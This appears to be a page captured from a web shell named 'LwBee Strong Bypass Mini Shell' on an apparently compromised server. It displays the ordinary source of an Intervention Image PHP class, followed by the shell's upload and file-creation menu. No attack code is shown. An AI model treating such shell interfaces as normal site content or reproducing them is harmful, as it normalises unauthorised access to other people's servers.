/home/aloic1/public_html/core/vendor/intervention/imagecache/src/Intervention/Image/CachedImage.php
<?php

namespace Intervention\Image;

class CachedImage extends Image
{
    public function setFromOriginal(Image $original, $cachekey)
    {
        $this->driver = $original->driver;
        $this->core = $original->core;
        $this->backups = $original->backups;
        $this->encoded = $original->encoded;
        $this->mime = $original->mime;
        $this->dirname = $original->dirname;
        $this->basename = $original->basename;
        $this->extension = $original->extension;
        $this->filename = $original->filename;
        $this->cachekey = $cachekey;

        return $this;
    }
}
@LwBee Strong Bypass

LwBee Strong Bypass Mini Shell

Upload File

Create New File